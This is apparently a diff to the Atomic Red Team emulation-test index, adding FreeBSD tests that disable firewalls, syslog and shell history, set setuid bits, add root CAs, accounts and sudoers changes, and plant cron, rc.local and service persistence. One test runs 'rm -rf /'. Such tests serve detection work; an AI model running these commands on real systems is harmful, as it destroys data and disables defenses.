input_arguments: @@ -5646,7 +6074,6 @@ defense-evasion: Setting the creation timestamp requires changing the system clock and reverting. Sudo or root privileges are required to change date. Use with caution. supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -5673,7 +6100,6 @@ defense-evasion: This technique was used by the threat actor Rocke during the compromise of Linux web servers. supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -6500,6 +6926,34 @@ defense-evasion: cleanup_command: | ufw enable ufw status verbose + - name: Stop/Start Packet Filter + auto_generated_guid: 0ca82ed1-0a94-4774-9a9a-a2c83a8022b7 + description: 'Stop the Packet Filter if installed. + + ' + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'Check if pfctl is installed on the machine. + + ' + prereq_command: "if [ ! -x \"$(command -v pfctl)\" ]; then echo -e \"\\n***** + PF NOT installed *****\\n\"; exit 1; fi\nif [ \"$(kldstat -n pf)\" = \"\" + ]; then echo -e \"\\n***** PF inactive *****\\n\"; exit 1; fi \n" + get_prereq_command: 'echo "" + + ' + executor: + name: sh + elevation_required: true + command: | + service pf stop + service pf disable + cleanup_command: | + service pf enable + service pf start + service pf status - name: Stop/Start UFW firewall systemctl auto_generated_guid: 9fd99609-1854-4f3c-b47b-97d9a5972bd1 description: "Stop the Uncomplicated Firewall (UFW) if installed, using systemctl. @@ -6581,6 +7035,33 @@ defense-evasion: cleanup_command: | { echo y; echo response; } | ufw delete 1 ufw status numbered + - name: Add and delete Packet Filter rules + auto_generated_guid: 8b23cae1-66c1-41c5-b79d-e095b6098b5b + description: "Add and delete a rule on the Packet Filter (PF) if installed and + enabled. \n" + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'Check if pf is installed on the machine and enabled. + + ' + prereq_command: "if [ ! -x \"$(command -v pfctl)\" ]; then echo -e \"\\n***** + PF NOT installed *****\\n\"; exit 1; fi\nif [ \"$(kldstat -n pf)\" = \"\" + ]; then echo -e \"\\n***** PF inactive *****\\n\"; exit 1; fi \n" + get_prereq_command: | + echo "anchor pf-rules >> /etc/pf.conf" + pfctl -f /etc/pf.conf + executor: + name: sh + elevation_required: true + command: | + echo "block in proto tcp from 1.2.3.4 to any" | pfctl -a pf-rules -f - + pfctl -a pf-rules -s rules + cleanup_command: | + pfctl -a pf-rules -F rules + sed -i "" '/anchor pf-rules/d' + pfctl -f /etc/pf.conf - name: Edit UFW firewall user.rules file auto_generated_guid: beaf815a-c883-4194-97e9-fdbbb2bbdd7c description: 'Edit the Uncomplicated Firewall (UFW) rules file /etc/ufw/user.rules. @@ -7620,9 +8101,8 @@ defense-evasion: Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change. supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: file_to_pad: description: Path of binary to be padded @@ -7655,9 +8135,8 @@ defense-evasion: Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change. supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: file_to_pad: description: Path of binary to be padded @@ -8582,6 +9061,32 @@ defense-evasion: sudo rm /tmp/hello.c name: sh elevation_required: true + - name: Make and modify binary from C source (freebsd) + auto_generated_guid: dd580455-d84b-481b-b8b0-ac96f3b1dc4c + description: 'Make, change owner, and change file attributes on a C source code + file + + ' + supported_platforms: + - linux + input_arguments: + payload: + description: hello.c payload + type: path + default: PathToAtomicsFolder/T1548.001/src/hello.c + executor: + command: | + cp #{payload} /tmp/hello.c + chown root /tmp/hello.c + make /tmp/hello + chown root /tmp/hello + chmod u+s /tmp/hello + /tmp/hello + cleanup_command: | + rm /tmp/hello + rm /tmp/hello.c + name: sh + elevation_required: true - name: Set a SetUID flag on file auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 description: 'This test sets the SetUID flag on a file in FreeBSD. @@ -8605,6 +9110,28 @@ defense-evasion: ' name: sh elevation_required: true + - name: Set a SetUID flag on file (freebsd) + auto_generated_guid: 9be9b827-ff47-4e1b-bef8-217db6fb7283 + description: 'This test sets the SetUID flag on a file in FreeBSD. + + ' + supported_platforms: + - linux + input_arguments: + file_to_setuid: + description: Path of file to set SetUID flag + type: path + default: "/tmp/evilBinary" + executor: + command: | + touch #{file_to_setuid} + chown root #{file_to_setuid} + chmod u+xs #{file_to_setuid} + cleanup_command: 'rm #{file_to_setuid} + + ' + name: sh + elevation_required: true - name: Set a SetGID flag on file auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c description: 'This test sets the SetGID flag on a file in Linux and macOS. @@ -8628,6 +9155,28 @@ defense-evasion: ' name: sh elevation_required: true + - name: Set a SetGID flag on file (freebsd) + auto_generated_guid: 1f73af33-62a8-4bf1-bd10-3bea931f2c0d + description: 'This test sets the SetGID flag on a file in FreeBSD. + + ' + supported_platforms: + - linux + input_arguments: + file_to_setuid: + description: Path of file to set SetGID flag + type: path + default: "/tmp/evilBinary" + executor: + command: | + touch #{file_to_setuid} + chown root #{file_to_setuid} + chmod g+xs #{file_to_setuid} + cleanup_command: 'rm #{file_to_setuid} + + ' + name: sh + elevation_required: true - name: Make and modify capabilities of a binary auto_generated_guid: db53959c-207d-4000-9e7a-cd8eb417e072 description: | @@ -8681,7 +9230,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux executor: command: 'find /usr/bin -perm -4000 @@ -8695,7 +9243,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux executor: command: 'find /usr/bin -perm -2000 @@ -9555,6 +10102,27 @@ defense-evasion: sed -i '$ d' /etc/#{libaudit_config_file_name} name: bash elevation_required: true + - name: Auditing Configuration Changes on FreeBSD Host + auto_generated_guid: cedaf7e7-28ee-42ab-ba13-456abd35d1bd + description: 'Emulates modification of auditd configuration files + + ' + supported_platforms: + - linux + input_arguments: + auditd_config_file_name: + description: The name of the auditd configuration file to be changed + type: string + default: audit_event + executor: + command: 'echo ''#art_test_1562_006_1'' >> /etc/security/#{auditd_config_file_name} + + ' + cleanup_command: 'sed -i "" ''/#art_test_1562_006_1/d'' /etc/security/#{auditd_config_file_name} + + ' + name: sh + elevation_required: true - name: Logging Configuration Changes on Linux Host auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c description: 'Emulates modification of syslog configuration. @@ -9598,6 +10166,29 @@ defense-evasion: fi name: bash elevation_required: true + - name: Logging Configuration Changes on FreeBSD Host + auto_generated_guid: 6b8ca3ab-5980-4321-80c3-bcd77c8daed8 + description: 'Emulates modification of syslog configuration. + + ' + supported_platforms: + - linux + input_arguments: + syslog_config_file_name: + description: The name of the syslog configuration file to be changed + type: string + default: syslog.conf + executor: + command: | + if [ -f "/etc/#{syslog_config_file_name}" ]; + then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name} + fi + cleanup_command: | + if [ -f "/etc/#{syslog_config_file_name}" ]; + then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name} + fi + name: sh + elevation_required: true T1562.007: technique: modified: '2023-04-15T00:25:36.502Z' @@ -11401,6 +11992,23 @@ defense-evasion: export HISTCONTROL=ignoreboth #{evil_command} name: sh + - name: Disable history collection (freebsd) + auto_generated_guid: cada55b4-8251-4c60-819e-8ec1b33c9306 + description: 'Disables history collection in shells + + ' + supported_platforms: + - linux + input_arguments: + evil_command: + description: Command to run after shell history collection is disabled + type: string + default: whoami + executor: + command: | + export HISTSIZE=0 + #{evil_command} + name: sh - name: Mac HISTCONTROL auto_generated_guid: 468566d5-83e5-40c1-b338-511e1659628d description: "The HISTCONTROL variable is set to ignore (not write to the history @@ -11481,6 +12089,25 @@ defense-evasion: # -> $HISTFILESIZE is zero cleanup_command: 'export HISTCONTROL=$(echo $TEST) + ' + - name: Setting the HISTSIZE environment variable + auto_generated_guid: 386d3850-2ce7-4508-b56b-c0558922c814 + description: | + An Adversary may set the sh history files size environment variable (HISTSIZE) to zero to prevent the logging of commands to the history file after they log out of the system. + + Note: we don't wish to log out, so we are just confirming the value of HISTSIZE. In this test we 1. echo HISTSIZE 2. set it to zero 3. confirm that HISTSIZE is set to zero. + supported_platforms: + - linux + executor: + name: sh + elevation_required: false + command: | + echo $HISTSIZE + export HISTSIZE=0 + if [ $(echo $HISTSIZE) -eq 0 ]; then echo "\$HISTSIZE is zero"; fi + # -> $HISTSIZE is zero + cleanup_command: 'export HISTSIZE=100 + ' - name: Setting the HISTFILE environment variable auto_generated_guid: b3dacb6c-a9e3-44ec-bf87-38db60c5cad1 @@ -11501,6 +12128,25 @@ defense-evasion: # -> $HISTFILE is /dev/null cleanup_command: 'export HISTFILE=$(echo $TEST) + ' + - name: Setting the HISTFILE environment variable (freebsd) + auto_generated_guid: f7308845-6da8-468e-99f2-4271f2f5bb67 + description: | + An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system. + + Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null. + supported_platforms: + - linux + executor: + name: sh + elevation_required: false + command: | + echo $HISTFILE + export HISTFILE="/dev/null" + if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; fi + # -> $HISTFILE is /dev/null + cleanup_command: 'export HISTFILE=~/.sh_history + ' - name: Setting the HISTIGNORE environment variable auto_generated_guid: f12acddb-7502-4ce6-a146-5b62c59592f1 @@ -12614,6 +13260,22 @@ defense-evasion: cleanup_command: "#{cleanup_command}\n" name: sh elevation_required: true + - name: Disable syslog (freebsd) + auto_generated_guid: db9de996-441e-4ae0-947b-61b6871e2fdf + description: 'Disables syslog collection + + ' + supported_platforms: + - linux + executor: + command: | + service syslogd stop + sysrc syslogd_enable="NO" + cleanup_command: | + sysrc syslogd_enable="YES" + service syslogd start + name: sh + elevation_required: true - name: Disable Cb Response auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 description: 'Disable the Cb Response service @@ -12732,7 +13394,6 @@ defense-evasion: as an additional \npayload to the compromised host and to make sure that there will be no recoverable data due to swap feature of FreeBSD/linux.\n" supported_platforms: - - linux:freebsd - linux executor: command: "swapon -a \nsleep 2\nswapoff -a\nsync\n" @@ -13398,6 +14059,37 @@ defense-evasion: /tmp/art.sh cleanup_command: "rm /tmp/encoded.dat \nrm /tmp/art.sh\n" name: sh + - name: Decode base64 Data into Script + auto_generated_guid: 197ed693-08e6-4958-bfd8-5974e291be6c + description: "Creates a base64-encoded data file and decodes it into an executable + shell script\n\nUpon successful execution, sh will execute art.sh, which is + a base64 encoded command, that echoes `Hello from the Atomic Red Team` \nand + uname -v\n" + supported_platforms: + - linux + input_arguments: + shell_command: + description: command to encode + type: string + default: echo Hello from the Atomic Red Team && uname -v + dependency_executor_name: sh + dependencies: + - description: 'encode the command into base64 file + + ' + prereq_command: 'exit 1 + + ' + get_prereq_command: 'echo "#{shell_command}" | b64encode -r - > /tmp/encoded.dat + + ' + executor: + command: | + cat /tmp/encoded.dat | b64decode -r > /tmp/art.sh + chmod +x /tmp/art.sh + /tmp/art.sh + cleanup_command: "rm /tmp/encoded.dat \nrm /tmp/art.sh\n" + name: sh T1556.006: technique: modified: '2023-02-09T14:18:59.080Z' @@ -14047,7 +14739,6 @@ defense-evasion: Upon successful execution, sh is renamed to `crond` and executed. supported_platforms: - - linux:freebsd - linux executor: command: | @@ -14679,6 +15370,33 @@ defense-evasion: update-ca-trust name: sh elevation_required: true + - name: Install root CA on FreeBSD + auto_generated_guid: f4568003-1438-44ab-a234-b3252ea7e7a3 + description: 'Creates a root CA with openssl + + ' + supported_platforms: + - linux + input_arguments: + cert_filename: + description: Path of the CA certificate we create + type: path + default: rootCA.crt + key_filename: + description: Key we create that is used to create the CA certificate + type: path + default: rootCA.key + executor: + command: | + openssl genrsa -out #{key_filename} 4096 + openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} + cp #{cert_filename} /usr/local/share/certs/ + certctl rehash + cleanup_command: | + rm /usr/local/share/certs/#{cert_filename} + certctl rehash + name: sh + elevation_required: true - name: Install root CA on Debian/Ubuntu auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff description: 'Creates a root CA with openssl @@ -14786,7 +15504,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -14818,7 +15535,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -14849,7 +15565,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -16496,7 +17211,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -16534,7 +17248,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -16590,6 +17303,20 @@ defense-evasion: ' name: bash + - name: Delete Filesystem - FreeBSD + auto_generated_guid: b5aaca7e-a48f-4f1b-8f0f-a27b8f516608 + description: 'This test deletes the entire root filesystem of a FreeBSD system. + This technique was used by Amnesia IoT malware to avoid analysis. This test + is dangerous and destructive, do NOT use on production equipment. + + ' + supported_platforms: + - linux + executor: + command: | + chflags -R 0 / + rm -rf / > /dev/null 2> /dev/null + name: sh T1158: technique: x_mitre_platforms: @@ -17285,6 +18012,22 @@ defense-evasion: chmod +x 'testdirwithspaceend /init ' './testdirwithspaceend /init ' cleanup_command: rm -rf /tmp/atomic-test-T1036.006 + - name: Space After Filename (FreeBSD) + auto_generated_guid: cfc1fbb5-caae-4f4c-bfa8-1b7c8b5cc4e8 + description: 'Space after filename. + + ' + supported_platforms: + - linux + executor: + name: sh + command: "mkdir -p /tmp/atomic-test-T1036.006\ncd /tmp/atomic-test-T1036.006\nmkdir + -p 'testdirwithspaceend '\n/bin/echo \"#\\!/bin/sh\" > \"testdirwithspaceend + /init \" && echo 'echo \"print(\\\"running T1035.006 with space after filename + to masquerade init\\\")\" | python3.9' >> \"testdirwithspaceend /init \" + && echo \"exit\" >> \"testdirwithspaceend /init \" \nchmod +x 'testdirwithspaceend + /init '\n'./testdirwithspaceend /init '\n" + cleanup_command: rm -rf /tmp/atomic-test-T1036.006 T1550.002: technique: modified: '2023-03-30T21:01:45.141Z' @@ -17923,7 +18666,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos executor: @@ -19039,6 +19781,23 @@ defense-evasion: whoami exit cleanup_command: "userdel -r art \n" + - name: Create local account (FreeBSD) + auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0 + description: 'An adversary may wish to create an account with admin privileges + to work with. In this test we create a "art" user with the password art, switch + to art, execute whoami, exit and delete the art user. + + ' + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art) + | pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n" + cleanup_command: 'rmuser -y art + + ' - name: Reactivate a locked/expired account (Linux) auto_generated_guid: d2b95631-62d7-45a3-aaef-0972cea97931 description: "A system administrator may have locked and expired a user account @@ -19062,6 +19821,30 @@ defense-evasion: whoami exit cleanup_command: "userdel -r art \n" + - name: Reactivate a locked/expired account (FreeBSD) + auto_generated_guid: '09e3380a-fae5-4255-8b19-9950be0252cf' + description: "A system administrator may have locked and expired a user account + rather than deleting it. \"the user is coming back, at some stage\" An adversary + may reactivate a inactive account in an attempt to appear legitimate. \n\nIn + this test we create a \"art\" user with the password art, lock and expire + the account, try to su to art and fail, unlock and renew the account, su successfully, + then delete the account.\n" + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: | + pw useradd art -g wheel -s /bin/sh + echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0 + pw lock art + pw usermod art -e +1d + pw unlock art + pw user mod art -e +99d + su art + whoami + exit + cleanup_command: "rmuser -y art \n" - name: Login as nobody (Linux) auto_generated_guid: 3d2cd093-ee05-41bd-a802-59ee5c301b85 description: 'An adversary may try to re-purpose a system account to appear @@ -19080,6 +19863,26 @@ defense-evasion: nobody\nsu nobody\nwhoami\nexit\n" cleanup_command: "chsh --shell /usr/sbin/nologin nobody\ncat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n" + - name: Login as nobody (freebsd) + auto_generated_guid: 16f6374f-7600-459a-9b16-6a88fd96d310 + description: 'An adversary may try to re-purpose a system account to appear + legitimate. In this test change the login shell of the nobody account, change + its password to nobody, su to nobody, exit, then reset nobody''s shell to + /usr/sbin/nologin. + + ' + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:Unprivileged + user:/nonexistent:/usr/sbin/nologin\npw usermod nobody -s /bin/sh\necho + $(openssl passwd -1 art) | pw mod user nobody -h 0\nsu nobody\nwhoami\nexit\n" + cleanup_command: | + pw usermod nobody -s /usr/sbin/nologin + cat /etc/passwd |grep nobody + # -> nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin T1211: technique: x_mitre_platforms: @@ -20427,6 +21230,27 @@ privilege-escalation: name: sh elevation_required: true command: "sudo -l \nsudo cat /etc/sudoers\nsudo vim /etc/sudoers\n" + - name: Sudo usage (freebsd) + auto_generated_guid: 2bf9a018-4664-438a-b435-cc6f8c6f71b1 + description: 'Common Sudo enumeration methods. + + ' + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'Check if sudo is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit + 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y sudo)\n" + executor: + name: sh + elevation_required: true + command: "sudo -l \nsudo cat /usr/local/etc/sudoers\nsudo ee /usr/local/etc/sudoers\n" - name: Unlimited sudo cache timeout auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc description: 'Sets sudo caching timestamp_timeout to a value for unlimited. @@ -20443,6 +21267,31 @@ privilege-escalation: command: | sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers sudo visudo -c -f /etc/sudoers + - name: Unlimited sudo cache timeout (freebsd) + auto_generated_guid: a83ad6e8-6f24-4d7f-8f44-75f8ab742991 + description: 'Sets sudo caching timestamp_timeout to a value for unlimited. + This is dangerous to modify without using ''visudo'', do not do this on a + production system. + + ' + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'Check if sudo is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit + 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y sudo)\n" + executor: + name: sh + elevation_required: true + command: | + sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /usr/local/etc/sudoers + sudo visudo -c -f /usr/local/etc/sudoers - name: Disable tty_tickets for sudo caching auto_generated_guid: 91a60b03-fb75-4d24-a42e-2eb8956e8de1 description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous @@ -20458,6 +21307,30 @@ privilege-escalation: command: | sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers" sudo visudo -c -f /etc/sudoers + - name: Disable tty_tickets for sudo caching (freebsd) + auto_generated_guid: 4df6a0fe-2bdd-4be8-8618-a6a19654a57a + description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous + to modify without using ''visudo'', do not do this on a production system. + + ' + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'Check if sudo is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit + 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y sudo)\n" + executor: + name: sh + elevation_required: true + command: | + sudo sh -c "echo Defaults "'!'"tty_tickets >> /usr/local/etc/sudoers" + sudo visudo -c -f /usr/local/etc/sudoers T1574.011: technique: modified: '2023-03-30T21:01:38.651Z' @@ -21218,9 +22091,8 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: command: description: Command to execute @@ -21271,6 +22143,33 @@ privilege-escalation: rm /etc/cron.hourly/#{cron_script_name} rm /etc/cron.monthly/#{cron_script_name} rm /etc/cron.weekly/#{cron_script_name} + - name: Cron - Add script to /etc/cron.d folder + auto_generated_guid: '078e69eb-d9fb-450e-b9d0-2e118217c846' + description: 'This test adds a script to /etc/cron.d folder configured to execute + on a schedule. + + ' + supported_platforms: + - linux + input_arguments: + command: + description: Command to execute + type: string + default: echo '*/5 * * * * root echo "Hello + from Atomic Red Team"' > /tmp/atomic.log + cron_script_name: + description: Name of file to store in cron folder + type: string + default: persistevil + executor: + elevation_required: true + name: sh + command: 'echo "#{command}" > /etc/cron.d/#{cron_script_name} + + ' + cleanup_command: 'rm /etc/cron.d/#{cron_script_name} + + ' - name: Cron - Add script to /var/spool/cron/crontabs/ folder auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4 description: 'This test adds a script to a /var/spool/cron/crontabs folder configured @@ -23220,6 +24119,32 @@ privilege-escalation: command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh" EXIT'' + ' + cleanup_command: 'rm -f /tmp/art-fish.txt + + ' + name: sh + - name: Trap EXIT (freebsd) + auto_generated_guid: be1a5d70-6865-44aa-ab50-42244c9fd16f + description: | + Launch bash shell with command arg to create TRAP on EXIT. + The trap executes script that writes to /tmp/art-fish.txt + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'Check if bash is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v bash)" ]; then exit 1; else exit + 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y bash)\n" + executor: + command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh" + EXIT'' + ' cleanup_command: 'rm -f /tmp/art-fish.txt @@ -23237,6 +24162,32 @@ privilege-escalation: command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh" SIGINT && kill -SIGINT $$'' + ' + cleanup_command: 'rm -f /tmp/art-fish.txt + + ' + name: sh + - name: Trap SIGINT (freebsd) + auto_generated_guid: ade10242-1eac-43df-8412-be0d4c704ada + description: | + Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal. + The trap executes script that writes to /tmp/art-fish.txt + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'Check if bash is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v bash)" ]; then exit 1; else exit + 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y bash)\n" + executor: + command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh" + SIGINT && kill -SIGINT $$'' + ' cleanup_command: 'rm -f /tmp/art-fish.txt @@ -23904,6 +24855,32 @@ privilege-escalation: sudo rm /tmp/hello.c name: sh elevation_required: true + - name: Make and modify binary from C source (freebsd) + auto_generated_guid: dd580455-d84b-481b-b8b0-ac96f3b1dc4c + description: 'Make, change owner, and change file attributes on a C source code + file + + ' + supported_platforms: + - linux + input_arguments: + payload: + description: hello.c payload + type: path + default: PathToAtomicsFolder/T1548.001/src/hello.c + executor: + command: | + cp #{payload} /tmp/hello.c + chown root /tmp/hello.c + make /tmp/hello + chown root /tmp/hello + chmod u+s /tmp/hello + /tmp/hello + cleanup_command: | + rm /tmp/hello + rm /tmp/hello.c + name: sh + elevation_required: true - name: Set a SetUID flag on file auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 description: 'This test sets the SetUID flag on a file in FreeBSD. @@ -23927,6 +24904,28 @@ privilege-escalation: ' name: sh elevation_required: true + - name: Set a SetUID flag on file (freebsd) + auto_generated_guid: 9be9b827-ff47-4e1b-bef8-217db6fb7283 + description: 'This test sets the SetUID flag on a file in FreeBSD. + + ' + supported_platforms: + - linux + input_arguments: + file_to_setuid: + description: Path of file to set SetUID flag + type: path + default: "/tmp/evilBinary" + executor: + command: | + touch #{file_to_setuid} + chown root #{file_to_setuid} + chmod u+xs #{file_to_setuid} + cleanup_command: 'rm #{file_to_setuid} + + ' + name: sh + elevation_required: true - name: Set a SetGID flag on file auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c description: 'This test sets the SetGID flag on a file in Linux and macOS. @@ -23950,6 +24949,28 @@ privilege-escalation: ' name: sh elevation_required: true + - name: Set a SetGID flag on file (freebsd) + auto_generated_guid: 1f73af33-62a8-4bf1-bd10-3bea931f2c0d + description: 'This test sets the SetGID flag on a file in FreeBSD. + + ' + supported_platforms: + - linux + input_arguments: + file_to_setuid: + description: Path of file to set SetGID flag + type: path + default: "/tmp/evilBinary" + executor: + command: | + touch #{file_to_setuid} + chown root #{file_to_setuid} + chmod g+xs #{file_to_setuid} + cleanup_command: 'rm #{file_to_setuid} + + ' + name: sh + elevation_required: true - name: Make and modify capabilities of a binary auto_generated_guid: db53959c-207d-4000-9e7a-cd8eb417e072 description: | @@ -24003,7 +25024,6 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd - linux executor: command: 'find /usr/bin -perm -4000 @@ -24017,7 +25037,6 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd - linux executor: command: 'find /usr/bin -perm -2000 @@ -26940,6 +27959,26 @@ privilege-escalation: head -n '-2' ~/.bashrc > /tmp/T1546.004 mv /tmp/T1546.004 ~/.bashrc name: sh + - name: Add command to .shrc + auto_generated_guid: 41502021-591a-4649-8b6e-83c9192aff53 + description: 'Adds a command to the .shrc file of the current user + + ' + supported_platforms: + - linux + input_arguments: + command_to_add: + description: Command to add to the .shrc file + type: string + default: echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004 + executor: + command: 'echo ''#{command_to_add}'' >> ~/.shrc + + ' + cleanup_command: | + head -n '-2' ~/.shrc > /tmp/T1546.004 + mv /tmp/T1546.004 ~/.shrc + name: sh - name: Append to the system shell profile auto_generated_guid: 694b3cc8-6a78-4d35-9e74-0123d009e94b description: 'An adversary may wish to establish persistence by executing malicious @@ -26947,7 +27986,6 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd - linux input_arguments: text_to_append: @@ -26970,7 +28008,6 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd - linux input_arguments: text_to_append: @@ -28466,6 +29503,27 @@ privilege-escalation: ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi + ' + - name: rc.local (FreeBSD) + auto_generated_guid: 2015fb48-8ab6-4fbf-928b-0b62de5c9476 + description: 'Modify rc.local + + ' + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: | + filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi + printf '%s\n' '#\!/usr/local/bin/bash' | sudo tee /etc/rc.local + echo 'python3.9 -c "import os, base64;exec(base64.b64decode(\"aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo=\"))"' | sudo tee -a /etc/rc.local + printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local + sudo chmod +x /etc/rc.local + cleanup_command: 'origfilename=''/etc/rc.local.original'';if [ ! -f $origfilename + ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && + sudo rm $origfilename;fi + ' T1134: technique: @@ -28741,6 +29799,45 @@ privilege-escalation: rm -rf #{systemd_service_path}/#{systemd_service_file} systemctl daemon-reload name: bash + - name: Create SysV Service + auto_generated_guid: 760fe8d2-79d9-494f-905e-a239a3df86f6 + description: 'This test creates a SysV service unit file and enables it as a + service. + + ' + supported_platforms: + - linux + input_arguments: + rc_service_path: + description: Path to rc service file + type: path + default: "/usr/local/etc/rc.d" + rc_service_file: + description: File name of rc service file + type: string + default: art-test + executor: + command: "echo '#\\!/bin/sh' > #{rc_service_path}/#{rc_service_file}\necho + ' ' >> #{rc_service_path}/#{rc_service_file}\necho '#' >> #{rc_service_path}/#{rc_service_file}\necho + '# PROVIDE: art-test' >> #{rc_service_path}/#{rc_service_file}\necho '# + REQUIRE: LOGIN' >> #{rc_service_path}/#{rc_service_file}\necho '# KEYWORD: + shutdown' >> #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file}\necho + '. /etc/rc.subr' >> #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file}\necho + 'name=\"art_test\"' >> #{rc_service_path}/#{rc_service_file}\necho 'rcvar=art_test_enable' + >> #{rc_service_path}/#{rc_service_file}\necho 'load_rc_config ${name}' + >> #{rc_service_path}/#{rc_service_file}\necho 'command=\"/usr/bin/touch\"' + >> #{rc_service_path}/#{rc_service_file}\necho 'start_cmd=\"art_test_start\"' + >> #{rc_service_path}/#{rc_service_file}\necho '' >> #{rc_service_path}/#{rc_service_file}\necho + 'art_test_start()' >> #{rc_service_path}/#{rc_service_file} \necho '{' + >> #{rc_service_path}/#{rc_service_file}\necho ' ${command} /tmp/art-test.marker' + >> #{rc_service_path}/#{rc_service_file}\necho '}' >> #{rc_service_path}/#{rc_service_file}\necho + ' ' >> #{rc_service_path}/#{rc_service_file} \necho 'run_rc_command + \"$1\"' >> #{rc_service_path}/#{rc_service_file}\nchmod +x #{rc_service_path}/#{rc_service_file}\nservice + art-test enable\nservice art-test start\n" + cleanup_command: | + sysrc -x art_test_enable + rm -f #{rc_service_path}/#{rc_service_file} + name: sh - name: Create Systemd Service file, Enable the service , Modify and Reload the service. auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89 @@ -29711,6 +30808,39 @@ privilege-escalation: name: sh 